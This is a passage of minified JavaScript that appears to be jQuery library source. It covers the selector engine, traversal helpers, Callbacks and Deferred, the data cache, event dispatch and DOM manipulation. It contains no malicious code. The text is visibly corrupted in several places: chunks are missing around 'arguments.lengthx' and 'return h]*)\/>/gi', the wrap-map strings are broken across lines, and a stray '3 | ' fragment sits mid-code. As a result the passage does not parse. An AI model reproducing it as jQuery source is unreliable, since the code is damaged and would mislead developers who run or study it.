j,k,l,m=[],n=[],o=g.length,p=f||tb(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:ub(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=ub(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?K.call(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=ub(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):I.apply(g,r)})}function wb(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],h=g||d.relative[" "],i=g?1:0,k=rb(function(a){return a===b},h,!0),l=rb(function(a){return K.call(b,a)>-1},h,!0),m=[function(a,c,d){return!g&&(d||c!==j)||((b=c).nodeType?k(a,c,d):l(a,c,d))}];f>i;i++)if(c=d.relative[a[i].type])m=[rb(sb(m),c)];else{if(c=d.filter[a[i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return vb(i>1&&sb(m),i>1&&qb(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(R,"$1"),c,e>i&&wb(a.slice(i,e)),f>e&&wb(a=a.slice(e)),f>e&&qb(a))}m.push(c)}return sb(m)}function xb(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,h,i,k){var l,m,o,p=0,q="0",r=f&&[],s=[],t=j,u=f||e&&d.find.TAG("*",k),v=w+=null==t?1:Math.random()||.1,x=u.length;for(k&&(j=g!==n&&g);q!==x&&null!=(l=u[q]);q++){if(e&&l){m=0;while(o=a[m++])if(o(l,g,h)){i.push(l);break}k&&(w=v)}c&&((l=!o&&l)&&p--,f&&r.push(l))}if(p+=q,c&&q!==p){m=0;while(o=b[m++])o(r,s,g,h);if(f){if(p>0)while(q--)r[q]||s[q]||(s[q]=G.call(i));s=ub(s)}I.apply(i,s),k&&!f&&s.length>0&&p+b.length>1&&fb.uniqueSort(i)}return k&&(w=v,j=t),r};return c?hb(f):f}return h=fb.compile=function(a,b){var c,d=[],e=[],f=A[a+" "];if(!f){b||(b=g(a)),c=b.length;while(c--)f=wb(b[c]),f[u]?d.push(f):e.push(f);f=A(a,xb(e,d)),f.selector=a}return f},i=fb.select=function(a,b,e,f){var i,j,k,l,m,n="function"==typeof a&&a,o=!f&&g(a=n.selector||a);if(e=e||[],1===o.length){if(j=o[0]=o[0].slice(0),j.length>2&&"ID"===(k=j[0]).type&&c.getById&&9===b.nodeType&&p&&d.relative[j[1].type]){if(b=(d.find.ID(k.matches[0].replace(cb,db),b)||[])[0],!b)return e;n&&(b=b.parentNode),a=a.slice(j.shift().value.length)}i=X.needsContext.test(a)?0:j.length;while(i--){if(k=j[i],d.relative[l=k.type])break;if((m=d.find[l])&&(f=m(k.matches[0].replace(cb,db),ab.test(j[0].type)&&ob(b.parentNode)||b))){if(j.splice(i,1),a=f.length&&qb(j),!a)return I.apply(e,f),e;break}}}return(n||h(a,o))(f,b,!p,e,ab.test(a)&&ob(b.parentNode)||b),e},c.sortStable=u.split("").sort(B).join("")===u,c.detectDuplicates=!!l,m(),c.sortDetached=ib(function(a){return 1&a.compareDocumentPosition(n.createElement("div"))}),ib(function(a){return a.innerHTML="","#"===a.firstChild.getAttribute("href")})||jb("type|href|height|width",function(a,b,c){return c?void 0:a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&ib(function(a){return a.innerHTML="",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||jb("value",function(a,b,c){return c||"input"!==a.nodeName.toLowerCase()?void 0:a.defaultValue}),ib(function(a){return null==a.getAttribute("disabled")})||jb(L,function(a,b,c){var d;return c?void 0:a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),fb}(a);n.find=t,n.expr=t.selectors,n.expr[":"]=n.expr.pseudos,n.unique=t.uniqueSort,n.text=t.getText,n.isXMLDoc=t.isXML,n.contains=t.contains;var u=n.expr.match.needsContext,v=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,w=/^.[^:#\[\.,]*$/;function x(a,b,c){if(n.isFunction(b))return n.grep(a,function(a,d){return!!b.call(a,d,a)!==c});if(b.nodeType)return n.grep(a,function(a){return a===b!==c});if("string"==typeof b){if(w.test(b))return n.filter(b,a,c);b=n.filter(b,a)}return n.grep(a,function(a){return g.call(b,a)>=0!==c})}n.filter=function(a,b,c){var d=b[0];return c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?n.find.matchesSelector(d,a)?[d]:[]:n.find.matches(a,n.grep(b,function(a){return 1===a.nodeType}))},n.fn.extend({find:function(a){var b,c=this.length,d=[],e=this;if("string"!=typeof a)return this.pushStack(n(a).filter(function(){for(b=0;c>b;b++)if(n.contains(e[b],this))return!0}));for(b=0;c>b;b++)n.find(a,e[b],d);return d=this.pushStack(c>1?n.unique(d):d),d.selector=this.selector?this.selector+" "+a:a,d},filter:function(a){return this.pushStack(x(this,a||[],!1))},not:function(a){return this.pushStack(x(this,a||[],!0))},is:function(a){return!!x(this,"string"==typeof a&&u.test(a)?n(a):a||[],!1).length}});var y,z=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,A=n.fn.init=function(a,b){var c,d;if(!a)return this;if("string"==typeof a){if(c="<"===a[0]&&">"===a[a.length-1]&&a.length>=3?[null,a,null]:z.exec(a),!c||!c[1]&&b)return!b||b.jquery?(b||y).find(a):this.constructor(b).find(a);if(c[1]){if(b=b instanceof n?b[0]:b,n.merge(this,n.parseHTML(c[1],b&&b.nodeType?b.ownerDocument||b:l,!0)),v.test(c[1])&&n.isPlainObject(b))for(c in b)n.isFunction(this[c])?this[c](b[c]):this.attr(c,b[c]);return this}return d=l.getElementById(c[2]),d&&d.parentNode&&(this.length=1,this[0]=d),this.context=l,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):n.isFunction(a)?"undefined"!=typeof y.ready?y.ready(a):a(n):(void 0!==a.selector&&(this.selector=a.selector,this.context=a.context),n.makeArray(a,this))};A.prototype=n.fn,y=n(l);var B=/^(?:parents|prev(?:Until|All))/,C={children:!0,contents:!0,next:!0,prev:!0};n.extend({dir:function(a,b,c){var d=[],e=void 0!==c;while((a=a[b])&&9!==a.nodeType)if(1===a.nodeType){if(e&&n(a).is(c))break;d.push(a)}return d},sibling:function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c}}),n.fn.extend({has:function(a){var b=n(a,this),c=b.length;return this.filter(function(){for(var a=0;c>a;a++)if(n.contains(this,b[a]))return!0})},closest:function(a,b){for(var c,d=0,e=this.length,f=[],g=u.test(a)||"string"!=typeof a?n(a,b||this.context):0;e>d;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&n.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?n.unique(f):f)},index:function(a){return a?"string"==typeof a?g.call(n(a),this[0]):g.call(this,a.jquery?a[0]:a):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(n.unique(n.merge(this.get(),n(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function D(a,b){while((a=a[b])&&1!==a.nodeType);return a}n.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return n.dir(a,"parentNode")},parentsUntil:function(a,b,c){return n.dir(a,"parentNode",c)},next:function(a){return D(a,"nextSibling")},prev:function(a){return D(a,"previousSibling")},nextAll:function(a){return n.dir(a,"nextSibling")},prevAll:function(a){return n.dir(a,"previousSibling")},nextUntil:function(a,b,c){return n.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return n.dir(a,"previousSibling",c)},siblings:function(a){return n.sibling((a.parentNode||{}).firstChild,a)},children:function(a){return n.sibling(a.firstChild)},contents:function(a){return a.contentDocument||n.merge([],a.childNodes)}},function(a,b){n.fn[a]=function(c,d){var e=n.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=n.filter(d,e)),this.length>1&&(C[a]||n.unique(e),B.test(a)&&e.reverse()),this.pushStack(e)}});var E=/\S+/g,F={};function G(a){var b=F[a]={};return n.each(a.match(E)||[],function(a,c){b[c]=!0}),b}n.Callbacks=function(a){a="string"==typeof a?F[a]||G(a):n.extend({},a);var b,c,d,e,f,g,h=[],i=!a.once&&[],j=function(l){for(b=a.memory&&l,c=!0,g=e||0,e=0,f=h.length,d=!0;h&&f>g;g++)if(h[g].apply(l[0],l[1])===!1&&a.stopOnFalse){b=!1;break}d=!1,h&&(i?i.length&&j(i.shift()):b?h=[]:k.disable())},k={add:function(){if(h){var c=h.length;!function g(b){n.each(b,function(b,c){var d=n.type(c);"function"===d?a.unique&&k.has(c)||h.push(c):c&&c.length&&"string"!==d&&g(c)})}(arguments),d?f=h.length:b&&(e=c,j(b))}return this},remove:function(){return h&&n.each(arguments,function(a,b){var c;while((c=n.inArray(b,h,c))>-1)h.splice(c,1),d&&(f>=c&&f--,g>=c&&g--)}),this},has:function(a){return a?n.inArray(a,h)>-1:!(!h||!h.length)},empty:function(){return h=[],f=0,this},disable:function(){return h=i=b=void 0,this},disabled:function(){return!h},lock:function(){return i=void 0,b||k.disable(),this},locked:function(){return!i},fireWith:function(a,b){return!h||c&&!i||(b=b||[],b=[a,b.slice?b.slice():b],d?i.push(b):j(b)),this},fire:function(){return k.fireWith(this,arguments),this},fired:function(){return!!c}};return k},n.extend({Deferred:function(a){var b=[["resolve","done",n.Callbacks("once memory"),"resolved"],["reject","fail",n.Callbacks("once memory"),"rejected"],["notify","progress",n.Callbacks("memory")]],c="pending",d={state:function(){return c},always:function(){return e.done(arguments).fail(arguments),this},then:function(){var a=arguments;return n.Deferred(function(c){n.each(b,function(b,f){var g=n.isFunction(a[b])&&a[b];e[f[1]](function(){var a=g&&g.apply(this,arguments);a&&n.isFunction(a.promise)?a.promise().done(c.resolve).fail(c.reject).progress(c.notify):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?n.extend(a,d):d}},e={};return d.pipe=d.then,n.each(b,function(a,f){var g=f[2],h=f[3];d[f[1]]=g.add,h&&g.add(function(){c=h},b[1^a][2].disable,b[2][2].lock),e[f[0]]=function(){return e[f[0]+"With"](this===e?d:this,arguments),this},e[f[0]+"With"]=g.fireWith}),d.promise(e),a&&a.call(e,e),e},when:function(a){var b=0,c=d.call(arguments),e=c.length,f=1!==e||a&&n.isFunction(a.promise)?e:0,g=1===f?a:n.Deferred(),h=function(a,b,c){return function(e){b[a]=this,c[a]=arguments.length>1?d.call(arguments):e,c===i?g.notifyWith(b,c):--f||g.resolveWith(b,c)}},i,j,k;if(e>1)for(i=new Array(e),j=new Array(e),k=new Array(e);e>b;b++)c[b]&&n.isFunction(c[b].promise)?c[b].promise().done(h(b,k,c)).fail(g.reject).progress(h(b,j,i)):--f;return f||g.resolveWith(k,c),g.promise()}});var H;n.fn.ready=function(a){return n.ready.promise().done(a),this},n.extend({isReady:!1,readyWait:1,holdReady:function(a){a?n.readyWait++:n.ready(!0)},ready:function(a){(a===!0?--n.readyWait:n.isReady)||(n.isReady=!0,a!==!0&&--n.readyWait>0||(H.resolveWith(l,[n]),n.fn.triggerHandler&&(n(l).triggerHandler("ready"),n(l).off("ready"))))}});function I(){l.removeEventListener("DOMContentLoaded",I,!1),a.removeEventListener("load",I,!1),n.ready()}n.ready.promise=function(b){return H||(H=n.Deferred(),"complete"===l.readyState?setTimeout(n.ready):(l.addEventListener("DOMContentLoaded",I,!1),a.addEventListener("load",I,!1))),H.promise(b)},n.ready.promise();var J=n.access=function(a,b,c,d,e,f,g){var h=0,i=a.length,j=null==c;if("object"===n.type(c)){e=!0;for(h in c)n.access(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,n.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(n(a),c)})),b))for(;i>h;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f};n.acceptData=function(a){return 1===a.nodeType||9===a.nodeType||!+a.nodeType};function K(){Object.defineProperty(this.cache={},0,{get:function(){return{}}}),this.expando=n.expando+Math.random()}K.uid=1,K.accepts=n.acceptData,K.prototype={key:function(a){if(!K.accepts(a))return 0;var b={},c=a[this.expando];if(!c){c=K.uid++;try{b[this.expando]={value:c},Object.defineProperties(a,b)}catch(d){b[this.expando]=c,n.extend(a,b)}}return this.cache[c]||(this.cache[c]={}),c},set:function(a,b,c){var d,e=this.key(a),f=this.cache[e];if("string"==typeof b)f[b]=c;else if(n.isEmptyObject(f))n.extend(this.cache[e],b);else for(d in b)f[d]=b[d];return f},get:function(a,b){var c=this.cache[this.key(a)];return void 0===b?c:c[b]},access:function(a,b,c){var d;return void 0===b||b&&"string"==typeof b&&void 0===c?(d=this.get(a,b),void 0!==d?d:this.get(a,n.camelCase(b))):(this.set(a,b,c),void 0!==c?c:b)},remove:function(a,b){var c,d,e,f=this.key(a),g=this.cache[f];if(void 0===b)this.cache[f]={};else{n.isArray(b)?d=b.concat(b.map(n.camelCase)):(e=n.camelCase(b),b in g?d=[b,e]:(d=e,d=d in g?[d]:d.match(E)||[])),c=d.length;while(c--)delete g[d[c]]}},hasData:function(a){return!n.isEmptyObject(this.cache[a[this.expando]]||{})},discard:function(a){a[this.expando]&&delete this.cache[a[this.expando]]}};var L=new K,M=new K,N=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,O=/([A-Z])/g;function P(a,b,c){var d;if(void 0===c&&1===a.nodeType)if(d="data-"+b.replace(O,"-$1").toLowerCase(),c=a.getAttribute(d),"string"==typeof c){try{c="true"===c?!0:"false"===c?!1:"null"===c?null:+c+""===c?+c:N.test(c)?n.parseJSON(c):c}catch(e){}M.set(a,b,c)}else c=void 0;return c}n.extend({hasData:function(a){return M.hasData(a)||L.hasData(a)},data:function(a,b,c){return M.access(a,b,c)},removeData:function(a,b){M.remove(a,b) 3 | },_data:function(a,b,c){return L.access(a,b,c)},_removeData:function(a,b){L.remove(a,b)}}),n.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=M.get(f),1===f.nodeType&&!L.get(f,"hasDataAttrs"))){c=g.length;while(c--)g[c]&&(d=g[c].name,0===d.indexOf("data-")&&(d=n.camelCase(d.slice(5)),P(f,d,e[d])));L.set(f,"hasDataAttrs",!0)}return e}return"object"==typeof a?this.each(function(){M.set(this,a)}):J(this,function(b){var c,d=n.camelCase(a);if(f&&void 0===b){if(c=M.get(f,a),void 0!==c)return c;if(c=M.get(f,d),void 0!==c)return c;if(c=P(f,d,void 0),void 0!==c)return c}else this.each(function(){var c=M.get(this,d);M.set(this,d,b),-1!==a.indexOf("-")&&void 0!==c&&M.set(this,a,b)})},null,b,arguments.length>1,null,!0)},removeData:function(a){return this.each(function(){M.remove(this,a)})}}),n.extend({queue:function(a,b,c){var d;return a?(b=(b||"fx")+"queue",d=L.get(a,b),c&&(!d||n.isArray(c)?d=L.access(a,b,n.makeArray(c)):d.push(c)),d||[]):void 0},dequeue:function(a,b){b=b||"fx";var c=n.queue(a,b),d=c.length,e=c.shift(),f=n._queueHooks(a,b),g=function(){n.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return L.get(a,c)||L.access(a,c,{empty:n.Callbacks("once memory").add(function(){L.remove(a,[b+"queue",c])})})}}),n.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.lengthx",k.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue}();var U="undefined";k.focusinBubbles="onfocusin"in a;var V=/^key/,W=/^(?:mouse|pointer|contextmenu)|click/,X=/^(?:focusinfocus|focusoutblur)$/,Y=/^([^.]*)(?:\.(.+)|)$/;function Z(){return!0}function $(){return!1}function _(){try{return l.activeElement}catch(a){}}n.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=L.get(a);if(r){c.handler&&(f=c,c=f.handler,e=f.selector),c.guid||(c.guid=n.guid++),(i=r.events)||(i=r.events={}),(g=r.handle)||(g=r.handle=function(b){return typeof n!==U&&n.event.triggered!==b.type?n.event.dispatch.apply(a,arguments):void 0}),b=(b||"").match(E)||[""],j=b.length;while(j--)h=Y.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o&&(l=n.event.special[o]||{},o=(e?l.delegateType:l.bindType)||o,l=n.event.special[o]||{},k=n.extend({type:o,origType:q,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&n.expr.match.needsContext.test(e),namespace:p.join(".")},f),(m=i[o])||(m=i[o]=[],m.delegateCount=0,l.setup&&l.setup.call(a,d,p,g)!==!1||a.addEventListener&&a.addEventListener(o,g,!1)),l.add&&(l.add.call(a,k),k.handler.guid||(k.handler.guid=c.guid)),e?m.splice(m.delegateCount++,0,k):m.push(k),n.event.global[o]=!0)}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=L.hasData(a)&&L.get(a);if(r&&(i=r.events)){b=(b||"").match(E)||[""],j=b.length;while(j--)if(h=Y.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o){l=n.event.special[o]||{},o=(d?l.delegateType:l.bindType)||o,m=i[o]||[],h=h[2]&&new RegExp("(^|\\.)"+p.join("\\.(?:.*\\.|)")+"(\\.|$)"),g=f=m.length;while(f--)k=m[f],!e&&q!==k.origType||c&&c.guid!==k.guid||h&&!h.test(k.namespace)||d&&d!==k.selector&&("**"!==d||!k.selector)||(m.splice(f,1),k.selector&&m.delegateCount--,l.remove&&l.remove.call(a,k));g&&!m.length&&(l.teardown&&l.teardown.call(a,p,r.handle)!==!1||n.removeEvent(a,o,r.handle),delete i[o])}else for(o in i)n.event.remove(a,o+b[j],c,d,!0);n.isEmptyObject(i)&&(delete r.handle,L.remove(a,"events"))}},trigger:function(b,c,d,e){var f,g,h,i,k,m,o,p=[d||l],q=j.call(b,"type")?b.type:b,r=j.call(b,"namespace")?b.namespace.split("."):[];if(g=h=d=d||l,3!==d.nodeType&&8!==d.nodeType&&!X.test(q+n.event.triggered)&&(q.indexOf(".")>=0&&(r=q.split("."),q=r.shift(),r.sort()),k=q.indexOf(":")<0&&"on"+q,b=b[n.expando]?b:new n.Event(q,"object"==typeof b&&b),b.isTrigger=e?2:3,b.namespace=r.join("."),b.namespace_re=b.namespace?new RegExp("(^|\\.)"+r.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,b.result=void 0,b.target||(b.target=d),c=null==c?[b]:n.makeArray(c,[b]),o=n.event.special[q]||{},e||!o.trigger||o.trigger.apply(d,c)!==!1)){if(!e&&!o.noBubble&&!n.isWindow(d)){for(i=o.delegateType||q,X.test(i+q)||(g=g.parentNode);g;g=g.parentNode)p.push(g),h=g;h===(d.ownerDocument||l)&&p.push(h.defaultView||h.parentWindow||a)}f=0;while((g=p[f++])&&!b.isPropagationStopped())b.type=f>1?i:o.bindType||q,m=(L.get(g,"events")||{})[b.type]&&L.get(g,"handle"),m&&m.apply(g,c),m=k&&g[k],m&&m.apply&&n.acceptData(g)&&(b.result=m.apply(g,c),b.result===!1&&b.preventDefault());return b.type=q,e||b.isDefaultPrevented()||o._default&&o._default.apply(p.pop(),c)!==!1||!n.acceptData(d)||k&&n.isFunction(d[q])&&!n.isWindow(d)&&(h=d[k],h&&(d[k]=null),n.event.triggered=q,d[q](),n.event.triggered=void 0,h&&(d[k]=h)),b.result}},dispatch:function(a){a=n.event.fix(a);var b,c,e,f,g,h=[],i=d.call(arguments),j=(L.get(this,"events")||{})[a.type]||[],k=n.event.special[a.type]||{};if(i[0]=a,a.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,a)!==!1){h=n.event.handlers.call(this,a,j),b=0;while((f=h[b++])&&!a.isPropagationStopped()){a.currentTarget=f.elem,c=0;while((g=f.handlers[c++])&&!a.isImmediatePropagationStopped())(!a.namespace_re||a.namespace_re.test(g.namespace))&&(a.handleObj=g,a.data=g.data,e=((n.event.special[g.origType]||{}).handle||g.handler).apply(f.elem,i),void 0!==e&&(a.result=e)===!1&&(a.preventDefault(),a.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,a),a.result}},handlers:function(a,b){var c,d,e,f,g=[],h=b.delegateCount,i=a.target;if(h&&i.nodeType&&(!a.button||"click"!==a.type))for(;i!==this;i=i.parentNode||this)if(i.disabled!==!0||"click"!==a.type){for(d=[],c=0;h>c;c++)f=b[c],e=f.selector+" ",void 0===d[e]&&(d[e]=f.needsContext?n(e,this).index(i)>=0:n.find(e,this,null,[i]).length),d[e]&&d.push(f);d.length&&g.push({elem:i,handlers:d})}return h]*)\/>/gi,bb=/<([\w:]+)/,cb=/<|&#?\w+;/,db=/<(?:script|style|link)/i,eb=/checked\s*(?:[^=]|=\s*.checked.)/i,fb=/^$|\/(?:java|ecma)script/i,gb=/^true\/(.*)/,hb=/^\s*\s*$/g,ib={option:[1,""],thead:[1,"","
"],col:[2,"","
"],tr:[2,"","
"],td:[3,"","
"],_default:[0,"",""]};ib.optgroup=ib.option,ib.tbody=ib.tfoot=ib.colgroup=ib.caption=ib.thead,ib.th=ib.td;function jb(a,b){return n.nodeName(a,"table")&&n.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function kb(a){return a.type=(null!==a.getAttribute("type"))+"/"+a.type,a}function lb(a){var b=gb.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function mb(a,b){for(var c=0,d=a.length;d>c;c++)L.set(a[c],"globalEval",!b||L.get(b[c],"globalEval"))}function nb(a,b){var c,d,e,f,g,h,i,j;if(1===b.nodeType){if(L.hasData(a)&&(f=L.access(a),g=L.set(b,f),j=f.events)){delete g.handle,g.events={};for(e in j)for(c=0,d=j[e].length;d>c;c++)n.event.add(b,e,j[e][c])}M.hasData(a)&&(h=M.access(a),i=n.extend({},h),M.set(b,i))}}function ob(a,b){var c=a.getElementsByTagName?a.getElementsByTagName(b||"*"):a.querySelectorAll?a.querySelectorAll(b||"*"):[];return void 0===b||b&&n.nodeName(a,b)?n.merge([a],c):c}function pb(a,b){var c=b.nodeName.toLowerCase();"input"===c&&T.test(a.type)?b.checked=a.checked:("input"===c||"textarea"===c)&&(b.defaultValue=a.defaultValue)}n.extend({clone:function(a,b,c){var d,e,f,g,h=a.cloneNode(!0),i=n.contains(a.ownerDocument,a);if(!(k.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||n.isXMLDoc(a)))for(g=ob(h),f=ob(a),d=0,e=f.length;e>d;d++)pb(f[d],g[d]);if(b)if(c)for(f=f||ob(a),g=g||ob(h),d=0,e=f.length;e>d;d++)nb(f[d],g[d]);else nb(a,h);return g=ob(h,"script"),g.length>0&&mb(g,!i&&ob(a,"script")),h},buildFragment:function(a,b,c,d){for(var e,f,g,h,i,j,k=b.createDocumentFragment(),l=[],m=0,o=a.length;o>m;m++)if(e=a[m],e||0===e)if("object"===n.type(e))n.merge(l,e.nodeType?[e]:e);else if(cb.test(e)){f=f||k.appendChild(b.createElement("div")),g=(bb.exec(e)||["",""])[1].toLowerCase(),h=ib[g]||ib._default,f.innerHTML=h[1]+e.replace(ab,"<$1>")+h[2],j=h[0];while(j--)f=f.lastChild;n.merge(l,f.childNodes),f=k.firstChild,f.textContent=""}else l.push(b.createTextNode(e));k.textContent="",m=0;while(e=l[m++])if((!d||-1===n.inArray(e,d))&&(i=n.contains(e.ownerDocument,e),f=ob(k.appendChild(e),"script"),i&&mb(f),c)){j=0;while(e=f[j++])fb.test(e.type||"")&&c.push(e)}return k},cleanData:function(a){for(var b,c,d,e,f=n.event.special,g=0;void 0!==(c=a[g]);g++){if(n.acceptData(c)&&(e=c[L.expando],e&&(b=L.cache[e]))){if(b.events)for(d in b.events)f[d]?n.event.remove(c,d):n.removeEvent(c,d,b.handle);L.cache[e]&&delete L.cache[e]}delete M.cache[c[M.expando]]}}}),n.fn.extend({text:function(a){return J(this,function(a){return void 0===a?n.text(this):this.empty().each(function(){(1===this.nodeType||11===this.nodeType||9===this.nodeType)&&(this.textContent=a)})},null,a,arguments.length)},append:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=jb(this,a);b.appendChild(a)}})},prepend:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=jb(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},remove:function(a,b){for(var c,d=a?n.filter(a,this):this,e=0;null!=(c=d[e]);e++)b||1!==c.nodeType||n.cleanData(ob(c)),c.parentNode&&(b&&n.contains(c.ownerDocument,c)&&mb(ob(c,"script")),c.parentNode.removeChild(c));return this},empty:function(){for(var a,b=0;null!=(a=this[b]);b++)1===a.nodeType&&(n.cleanData(ob(a,!1)),a.textContent="");return this},clone:function(a,b){return a=null==a?!1:a,b=null==b?a:b,this.map(function(){return n.clone(this,a,b)})},html:function(a){return J(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a&&1===b.nodeType)return b.innerHTML;if("string"==typeof a&&!db.test(a)&&!ib[(bb.exec(a)||["",""])[1].toLowerCase()]){a=a.replace(ab,"<$1>");try{for(;d>c;c++)b=this[c]||{},1===b.nodeType&&(n.cleanData(ob(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=arguments[0];return this.domManip(arguments,function(b){a=this.parentNode,n.cleanData(ob(this)),a&&a.replaceChild(b,this)}),a&&(a.length||a.nodeType)?this:this.remove()},detach:function(a){return this.remove(a,!0)},domManip:function(a,b){a=e.apply([],a);var c,d,f,g,h,i,j=0,l=this.length,m=this,o=l-1,p=a[0],q=n.isFunction(p);if(q||l>1&&"string"==typeof p&&!k.checkClone&&eb.test(p))return this.each(function(c){var d=m.eq(c);q&&(a[0]=p.call(this,c,d.html())),d.domManip(a,b)});if(l&&(c=n.buildFragment(a,this[0].ownerDocument,!1,this),d=c.firstChild,1===c.childNodes.length&&(c=d),d)){for(f=n.map(ob(c,"script"),kb),g=f.length;l>j;j++)h=c,j!==o&&(h=n.clone(h,!0,!0),g&&n.merge(f,ob(h,"script"))),b.call(this[j],h,j);if(g)for(i=f[f.length-1].ownerDocument,n.map(f,lb),j=0;g>j;j++)h=f[j],fb.test(h.type||"")&&!L.access(h,"globalEval")&&n.contains(i,h)&&(h.src?n._evalUrl&&n._evalUrl(h.src):n.globalEval(h.textContent.replace(hb,"")))}return this}}),n.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){n.fn[a]=function(a){for(var c,d=[],e=n(a),g=e.length-1,h=0;g>=h;h++)c=h===g?this:this.clone(!0),n(e[h])[b](c),f.apply(d,c.get());return this.pushStack(d)}});var qb,rb={};function sb(b,c){var d,e=n(c.createElement(b)).appendTo(c.body),f=a.getDefaultComputedStyle&&(d=a.getDefaultComputedStyle(e[0]))?d.display:n.css(e[0],"display");return e.detach(),f}function tb(a){var b=l,c=rb[a];return c||(c=sb(a,b),"none"!==c&&c||(qb=(qb||n("